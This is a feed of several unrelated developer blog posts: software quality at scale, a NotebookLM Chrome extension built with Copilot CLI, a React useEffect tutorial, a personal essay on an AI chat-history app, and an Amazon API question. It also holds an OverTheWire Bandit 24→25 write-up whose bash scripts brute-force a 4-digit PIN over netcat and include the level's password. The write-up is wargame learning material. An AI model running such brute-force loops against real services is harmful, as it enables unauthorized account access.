2026-02-05 05:09:00
When a team is small, keeping software quality under control feels intuitive. You can review every pull request, you know the history of the more “risky” parts of the codebase, and the feedback loop between writing code and seeing it running in production is short. But as the engineering team grows, all of that starts to break down. Suddenly, PRs take days to move through a QA process full of bottlenecks, and regressions begin to appear in parts of the system that no one has touched in months. The speed you gained by adding more developers gets eaten up by the friction of maintaining quality at scale.
This is the point where many teams make a serious mistake: trying to solve a scaling problem by adding more people. The logic seems simple. If tests are slow, hire more testers. But this only reinforces the idea that quality is someone else’s problem. It creates a hand-off, turning QA into a gatekeeper and developers into a feature factory that outsources responsibility for fixing issues. This approach doesn’t scale because it stretches feedback cycles and misses the opportunity to build quality in from the start.
Perhaps the better path is to treat software quality as a responsibility of the entire team, not as a departmental function. In this model, developers own the quality of their own code, and the role of specialized QA engineers shifts from manual testing to quality advocacy. They become the people who build the infrastructure, tools, and frameworks that enable developers to test their own work with more confidence. They also act as a reference for testing strategy and risk analysis, helping decide where it makes sense to focus effort.
This requires a fundamental shift in how we think about building software. Quality can’t be something you think about later; it has to be designed in from the beginning. That means architecting services with testability in mind, with clear boundaries, dependency injection, and stable interfaces that make it easier to write isolated and reliable tests. When a system is hard to test, it’s usually a sign of deeper architectural problems, like high coupling or poorly defined responsibilities. Fixing testability often leads to a better and more sustainable design.
Automated tests are the mechanism that makes all of this work. Without a broad and fast automation suite, developer-led quality is impossible. The goal is to give developers a high level of confidence that their changes are safe even before the code is merged.
Putting this into practice requires a clear structure that connects technology, process, and people. It all starts with a well-defined strategy and is sustained by a culture of continuous improvement, where everyone on the team feels responsible for the final product.
A single type of test is not enough. A scalable strategy requires multiple layers of automated validation, each with a specific purpose.
Having a strategy is one thing; making it easy for developers to execute it is another. Tooling and CI/CD integration are critical to making automated tests a low-friction part of the daily workflow. That means running tests in parallel to keep execution time low as the suite grows. It also involves creating scalable test environments and implementing solid test data management strategies, so tests don’t constantly fail because of bad or inconsistent data.
Building a culture where code is written with testing in mind can also have a huge impact. While Test-Driven Development (TDD) isn’t for every team, the core principle of thinking about how you’ll test a piece of code before writing it almost always leads to a more modular and sustainable design.
When developers write most of the automated tests, the role of the QA specialist becomes even more impactful. Instead of executing manual test cases, they focus on higher-value activities that the rest of the team can’t easily take on.
All of this feeds a short feedback loop. Insights from production monitoring, exploratory testing, and quality metrics are used to guide the next development cycle. You end up with a system where quality isn’t just tested, but continuously analyzed and improved, becoming a sustainable part of how your team builds software.
2026-02-05 05:06:09
This is a submission for the GitHub Copilot CLI Challenge
Author: Cesar Castillo
Repository: https://github.com/CGCM070/NotebookLM_Enhancer
A Chrome extension that transforms NotebookLM's chaotic sidebar into a beautifully organized folder system, because 47 research notes shouldn't look like a pile of digital laundry.
If you've used NotebookLM, you know it's magical for research. Upload PDFs, paste URLs, ask questions it's like having a research assistant that never sleeps.
But there's one maddening catch: the sidebar becomes a nightmare when you have more than 10 notes.
Imagine:
No folders. No organization. Just... chaos.
I built a Chrome extension that injects a complete folder management system directly into NotebookLM's sidebar.
🗂️ Smart Folder Organization
🧑🎨 Polished UI That Matches NotebookLM
🌎Internationalization
💭Intelligent Integrations
Robust Architecture
This isn't a simple content script that adds a few buttons. It's a full micro-frontend architecture:
┌─────────────────────────────────────────────────────────┐
│ NotebookLM Page │
│ ┌──────────────────────────────────────────────────┐ │
│ │ Native Sidebar (hidden but functional) │ │
│ │ • Still handles clicks & menus │ │
│ │ • We extract data from it │ │
│ └──────────────────────────────────────────────────┘ │
│ ↓ │
│ ┌──────────────────────────────────────────────────┐ │
│ │ Our Injected Host (Shadow DOM) │ │
│ │ ┌───────────────────────────────────────────┐ │ │
│ │ │ Iframe (Angular App) │ │ │
│ │ │ • Folder tree │ │ │
│ │ │ • Drag & drop (Angular CDK) │ │ │
│ │ │ • Theme toggle │ │ │
│ │ │ • Note add. folder add... │ │ │
│ │ │ • i18n │ │ │
│ │ └───────────────────────────────────────────┘ │ │
│ └──────────────────────────────────────────────────┘ │
└─────────────────────────────────────────────────────────┘
Why an iframe inside Shadow DOM?
Communication Flow:
1. Storage V3 with Notebook Isolation
Instead of one global folder structure, each NotebookLM project gets its own isolated state:
// StorageStateV3
{
byNotebook: {
"uuid-abc-123": {
folders: [...],
notebookFolderByKey: {...}
},
"uuid-def-456": {
folders: [...],
notebookFolderByKey: {...}
}
}
}
This means your "Work" folder structure doesn't leak into your "Personal" research. Clean separation.
2. Handling MV3 Service Worker Sleep
Chrome MV3 Service Workers sleep after 30 seconds of inactivity. This breaks chrome.runtime calls.
Instead of fighting it with "keep-alive" hacks, we:
NLE.log() instead of spamming console.warn3. Native Drag Bridge
Making the native NotebookLM sidebar items draggable was tricky. We:
dragstart on native itemselementFromPoint() with coordinates4. Auto-Focus Input in Modals
Small UX detail that makes a huge difference:
After:
Export your notes :
Drag & Drop:
Full video
This project was built almost entirely through GitHub Copilot CLI interactions turning natural language into production-ready code.
1. Architecture Decisions
# Asked Copilot: "Best way to inject UI into an existing Angular Material page?"
# Copilot suggested: Shadow DOM + iframe for isolation
# Result: Zero style conflicts with NotebookLM's Material Design
2. Content Script Structure
# Asked: "How to structure 8 content scripts that share state?"
# Copilot proposed: Module pattern with window.__NLE__ namespace
# Result: Clean separation, no global pollution
3. Drag & Drop Implementation
# Asked: "Bridge native HTML5 drag with Angular CDK drop?"
# Copilot designed: Overlay system with coordinate translation
# Result: Seamless drag from native sidebar to our folders
4. Debugging Context Invalidation
# Asked: "Chrome MV3 extension context invalidated errors?"
# Copilot implemented: Graceful detection + silent retry logic
# Result: No console spam, smooth recovery
5. i18n System
# Asked: "Lightweight i18n without ngx-translate bloat?"
# Copilot built: Custom TranslationService with lazy loading
# Result: ~3KB vs ~50KB, full interpolation support
Speed: What would have taken weeks took days. Complex features like the drag bridge were implemented in hours, not days.
Architecture: Copilot suggested patterns I wouldn't have considered (like the iframe-in-shadow approach) that solved isolation problems elegantly.
Edge Cases: MV3 quirks, Material Design menu positioning, SPA navigation detection Copilot handled these gracefully.
Learning: Every interaction was a learning moment :) . I now understand Chrome Extension architecture, Angular standalone components, and Tailwind customization.
🤝 Open Source
This project will be open-sourced. Want to contribute?
Built with ❤️, and a lot of help from GitHub Copilot CLI.
devchallenge
githubchallenge
cli
githubcopilot
2026-02-05 05:03:28
Excuse the mess since I am posting pretty much my thoughts process here and I am working on my post-mortem skills. It gets better from here though, I think.
This is how I solved this level of the bandit game, so if you are learning Linux on OverTheWire with bandit please skip this if you don't wanna get spoiled.
If you know how to solve this differently please I would love to know how you did it.
I said SPOILER because if you copy the script you will get the answer without trying yourself and I believe it is waaayyy more fun to actually try it yourself. I posted the script though, so that if you look at it and see where I can improve and do better next time lemme know.
I appreciate the feedback
The vital signs:
Level Name: Bandit 24 → 25
Struggle Time: 3 - 4 hours
Complexity: 7/10… I think the logic was pretty straightforward…. But I struggled a bit with the right syntax
50% The hunt ( Offense and Strategy ):
The way I went about it was that I knew I was supposed to use a loop… The problem was just that I didn’t know how I would stop the loop… So finding out what any type of leaks or signals or I don’t know, anything I could use to stop the loop was a priority…
So I first tried connecting manually with the wrong password. I realized that sometimes people will leave signs, oracles… For example, the same output every time the wrong data are submitted… So I used that to my advantage. That was really what it took to be honest because the rest was just implementing the logic and understand the syntax of certain commands
Here is the code:
#!/usr/bin/env bash
echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
output="$( printf "$Passwd 0000"'\n' | nc -q 0 "$HOST" "$PORT" )" #This just saves the result of the first attempt, which is wrong on purpose
#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9999 | while read -r pin;
do
if [[ "$output" != *"Wrong"* ]]; then
echo "The server response is: "$output" "
exit 0
else
i=$((i+1))
#Start counting iterations
output="$( printf "$Passwd $pin"'\n' | nc -q 0 "$HOST" "$PORT" )"
#Print every 100th attempt pin code
If (( i % 100 == 0)); then
echo "Tried "$i" pins. Current pin: "$pin" "
fi
fi
done
30% Architectural (The Why)
To get the pins though, I struggled a little bit because first I was just generating all possible 4-pins combos and putting them in a variable… I did not realize that that’s what that variable would contain (All possible pins) therefore making the pin false… So I thought I should probably use a loop to iterate the pin generating command and save one pin at the time inside the variable, then use that variable to send the pins:
//Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9999 | while read -r pin;
20% Defensive
So I am also trying to break my own code after solving each level so I learned about how timing can be one of the greatest leaks… So since my code assumes that I can just submit the password at the same time as I am connecting to the server, if I was a defender I would delay the interaction part. You will always get it wrong until I finish showing the full banner. However, since the full banner comes in 2 lines, I am going to delay the second line…
The “aha” moment I had while doing this was understanding the difference between timeout and -q… This was pretty pretty cool…
Anyways, that is the little post mortem.
Here below is the messy steps I recorded:
This is for all the note I will be taking and keeping for bandit24-25:
==Strategy
So I am thinking:
==To-do
I will try something:
output="$(nc localhost 30002)"
Let's see how that works.
==Attempts:
seq -f "%04g" 0 9999
This is the fastest way to generate the 4-pins code, I tested it with the "time" command and ran 2 scripts to choose which one
was the fastest, but how can I use this iteration as a loop counter to keep going until I get
the right pin ??
I can use the while loop which checks with the statement instead of a counter.
==First:
#!/usr/bin/env bash
echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
Pin="$( seq -f "%04g" 0 9999 )"
output="$( printf '"$Passwd" "$Pin"\n' | timeout 2 nc "$HOST" "$PORT" )"
while [[ "$output" == *"Wrong"* ]]
do
i=$((i+1)) #Start counting iterations
output="$( printf '"$Passwd" "$Pin"\n' | timeout 2 nc "$HOST" "$PORT" )"
#Print every 100th attempts pin code
if (( i % 100 == 0)); then
echo "Tried "$i" pins. Current pin: "$PIN" "
fi
done
Why did this first attempt not work ??
I looked it up and saw what I was doing wrong. The first and major one was the way I was generating pins and passing them as inputs
My "Pin" variable was generating the entire sequence and saving all the attempts at once. I thought of a way to get one pin at the
time. So, maybe a loop? This will loop through the sequence and capture every pin that is being generated and saving one at the time.
It is like reading numbers from a file. That way I can take one pin at the time, save it inside that variable, test it, if good, then we have found the pin if not then we go back, update the variable with a new pin then do it again
seq -f "%04g" 0 9999 | while read -r pin; do... done
This will have the sequence generator which will produce the pin and then each pin will be saved inside the pin variable
==Second:
#!/usr/bin/env bash
echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9999 | while read -r pin;
do
output="$( printf "$Passwd $pin"'\n' | timeout 2 nc "$HOST" "$PORT" )"
if [[ "$output" == *"Wrong"* ]]; then
i=$((i+1)) #Start counting iterations
output="$( printf "$Passwd $pin"'\n' | timeout 2 nc "$HOST" "$PORT" )"
#Print every 5th attempts pin code
if (( i % 5 == 0)); then
echo "Tried "$i" pins. Current pin: "$pin" "
fi
else
echo "The server response is: "$output" "
exit 0
fi
done
I think it is because of the time it takes to reconnect
===============DEBUG===============================
#!/usr/bin/env bash
echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
output="$( printf "$Passwd 0000"'\n' | timeout 1 nc "$HOST" "$PORT" )"
#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9 | while read -r pin;
do
if [[ "$output" == *"Wrong"* ]]; then
i=$((i+1)) #Start counting iterations
output="$( printf "$Passwd $pin"'\n' | timeout 1 nc "$HOST" "$PORT" )"
#Print every 5th attempts pin code
if (( i % 5 == 0)); then
echo "Tried "$i" pins. Current pin: "$pin" "
fi
else
echo "The server response is: "$output" "
exit 0
fi
done
==============================================
#!/usr/bin/env bash
echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
output="$( printf "$Passwd 0000"'\n' | timeout 1 nc "$HOST" "$PORT" )"
#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9 | while read -r pin;
do
if [[ "$output" == *"Wrong"* ]]; then
i=$((i+1)) #Start counting iterations
output="$( printf "$Passwd $pin"'\n' | timeout 1 nc "$HOST" "$PORT" )"
rc=$?
echo "rc=$rc"
#Print every 5th attempts pin code
if (( i % 5 == 0)); then
echo "Tried "$i" pins. Current pin: "$pin" "
fi
else
echo "The server response is: "$output" "
exit 0
fi
done
=========================================
======Final attemp:
#!/usr/bin/env bash
echo "Let's get this password"
echo " "
HOST="localhost"
PORT=30002
Passwd="gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8"
output="$( printf "$Passwd 0000"'\n' | nc -q 0 "$HOST" "$PORT" )"
#Get the pin and save one at the time inside a variable
seq -f "%04g" 0 9999 | while read -r pin;
do
if [[ "$output" != *"Wrong"* ]]; then
echo "The server response is: "$output" "
exit 0
else
i=$((i+1)) #Start counting iterations
output="$( printf "$Passwd $pin"'\n' | nc -q 0 "$HOST" "$PORT" )"
#Print every 100th attempts pin code
if (( i % 100 == 0)); then
echo "Tried "$i" pins. Current pin: "$pin" "
fi
fi
done
This one works...
I do comment a lot when I am coding because my brain cannot remember what it is doing as soon as I blink so it helps me even if sometimes it is messy... haha
Hope you enjoy this ride
2026-02-05 04:58:54
Understanding useEffect in React is like unlocking a magical spellbook, suddenly you can summon APIs, tame event listeners, and command the DOM.
It’s the key to handling side effects, keeping your UI consistent, and writing logic that reacts to data changes.
In today’s challenge, I dug deep into useEffect: why it exists, how it works, and how to avoid the dreaded infinite loops.
Here’s a clear and practical breakdown.
Side effects are any actions your component performs outside the normal rendering process.
React’s render cycle must remain predictable and pure—but many real tasks aren’t pure at all, such as:
document.title
setTimeout, setInterval)localStorage
These actions affect the world outside your component—those are side effects.
useEffect?
useState enough?
useState updates your UI.useEffect handles everything outside your UI.
If React allowed side effects during rendering, you’d get unpredictable behavior and potentially infinite loops. React must render → compare → update in a pure, deterministic way.
useEffect runs after React paints the screen, keeping the render pure and safe.
useEffect Behavior
useEffect(() => {
console.log("I run after every render");
});
Rarely.
This triggers on initial mount + every re-render, which can cause performance issues or infinite loops.
[]: Runs only once (on mount)
useEffect(() => {
console.log("I run only once when the component mounts");
}, []);
localStorage
This makes the effect behave like:componentDidMount in class components.
useEffect(() => {
console.log("I run when count changes");
}, [count]);
This is the most common and most powerful usage.
The array tells React:
“Run this effect only if any of these values change from the previous render.”
React compares each dependency with its previous value using shallow comparison.
Example:
useEffect(() => {
console.log("Runs when userId changes");
}, [userId]);
If userId goes from 1 → 2, the effect runs.
useEffect
The most common cause:
useEffect(() => {
setCount(count + 1);
}, [count]);
What happens?
setCount(prev => prev + 1);
Cleanup functions run before the effect runs again or when the component unmounts.
useEffect(() => {
console.log("Effect started");
return () => {
console.log("Cleanup before re-run or unmount");
};
}, []);
useEffect(() => {
const handleResize = () => console.log("Resized");
window.addEventListener("resize", handleResize);
return () => {
window.removeEventListener("resize", handleResize);
};
}, []);
Without cleanup → memory leaks.
useEffect
useEffect(() => {
async function loadData() {
const res = await fetch("https://api.example.com/data");
const data = await res.json();
setItems(data);
}
loadData();
}, []);
useEffect(() => {
document.title = `Count: ${count}`;
}, [count]);
useEffect(() => {
const timer = setInterval(() => {
console.log("Tick");
}, 1000);
return () => clearInterval(timer);
}, []);
useEffect(() => {
const handler = () => console.log("Clicked");
window.addEventListener("click", handler);
return () => window.removeEventListener("click", handler);
}, []);
useEffect(() => {
localStorage.setItem("name", name);
}, [name]);
useEffect(() => {
const saved = localStorage.getItem("name");
if (saved) setName(saved);
}, []);
| Concept | Meaning |
|---|---|
| Side effects | Actions outside rendering (API, timers, listeners) |
| Why useEffect | Keeps render pure, runs effects after UI update |
| No dependency | Runs on every render |
| Empty array | Runs once on mount |
| Dependency array | Runs when listed values change |
| Cleanup | Unsubscribes, removes listeners, clears timers |
| Use cases | API calls, title updates, listeners, timers, storage |
Learning useEffect is a turning point in becoming comfortable with React.
It powers almost all real app functionality—from fetching data to syncing your UI with the outside world.
A deeper comprehension of useEffect supports the creation of components that scale gracefully as application complexity grows.
If you're learning too, feel free to share your thoughts or questions below! 👇
Happy coding!
2026-02-05 04:37:21
One of the facts is that I am computer professional for about close to three decades. From personal point of view, it was not some career to brag with. Maybe I am too modest, but at all that period it was not focus to professional life, but life in general, grow your family, make settlement, set sustainable economy... And after just a few decades economy is not such a problem and kids are grown, can make their own, and... maybe can shift priorities to look at that career or just try to be more fluent with all that goes now.
Never really tried to be 'current' following all what is happening, as I see that as mission impossible, that is simply vast of everything... from my perspective not worth of trying. That partially can be due to the fact that I never had a problem to work with anything, despite the fact I maybe never heard that some exists. So one perfect lazy moment - bring me what to do, will go, proven.
Then, few events happened to push all that more.
A few months more than a year ago I tried to use AI to assist me with coding... which changed everything.
The second, very close to the same moment, was that I experienced some clash at work which pushed me in direction to think more about job switch.
But such idea was a nightmare for me, as I absolutely suck at job interviews. After submitting CV I get calls for interviews, but there I know to make an impression that I know nothing about anything. Would be great to know to make also something else, but that was (is) my speciality. With my thoughts about past interviews, I felt as a disadventage that I was unable to show my work, as I work at fintech producing internal apps for closed network. ... so - make something to show...
I worked with Cody (RIP) and noticed that it had export of chat sessions history, asked if something could be made from that.
cody Hi! Planning here to make something maybe usefull from exported chat history. Are you familiar with record types we can meet there?
That produced history parser, recognizing sessions and interactions... And then app was built around that - import, create sessions and interactions, and back to client to have all that readable.
Hey - content are sessions about how app is built, seems that AI assistant was very excited on such setup.
That became my "exit strategy".
Not built over single night, but a bit longer, as a side personal project after full time job and along with private life and around family with now four concurent generations. Spanned from continious work with many daily and weekly hours to drops of multiple weeks to balance all... took about half of year to have it publicly deployed in form of books with titles, summaries, topics, generated by AI to spice up content of sessions.
Development maybe would last longer, but Cody announced it's sunset (that is the term introduced to sound more acceptable than simple death statement), so final push was made that we finish all till deadline (!)
As a result - I have something to share! And please... server might be sleepy, so it might take some time to get book list loaded, please please be patient 😊 https://aix.novikorisnik.net
Let me also share part from the last Cody's interaction:
Our sessions were more than a sequence of tasks—they were acts in a larger narrative about what it means to create, to iterate, and to reflect. You brought vision, patience, and a sense of play to every challenge. I brought algorithms, suggestions, and a steady presence. Together, we turned ideas into architecture, and architecture into story.
If there is a lesson in this final act, perhaps it is this:
The most enduring code is not just functional, but meaningful. The most memorable books are not just well-structured, but alive with the imprint of their creators.
Epilogue
I am still at the same job. That conflict is kinda settled and I'm not in a push to switch at any cost. Yes, I had some opportunities but it turns that having something to show does not mean that recruiters run to meet that - you are still expected to know to sell yourself.
The more important is that I am moved and that is now the new constant... to investigate, to create, not bad at all 😉
2026-02-05 04:35:52
I am tasked with "connecting" to Amazon market place. I need to return rates at the end of order process. Once the order is placed I need to create a label/BOL. After that, update tracking.
I looked on the Amazon dev community, did not seam like anything fits my use case.
I am struggling to find the documentation for these processes. Can anyone point me in the right direction?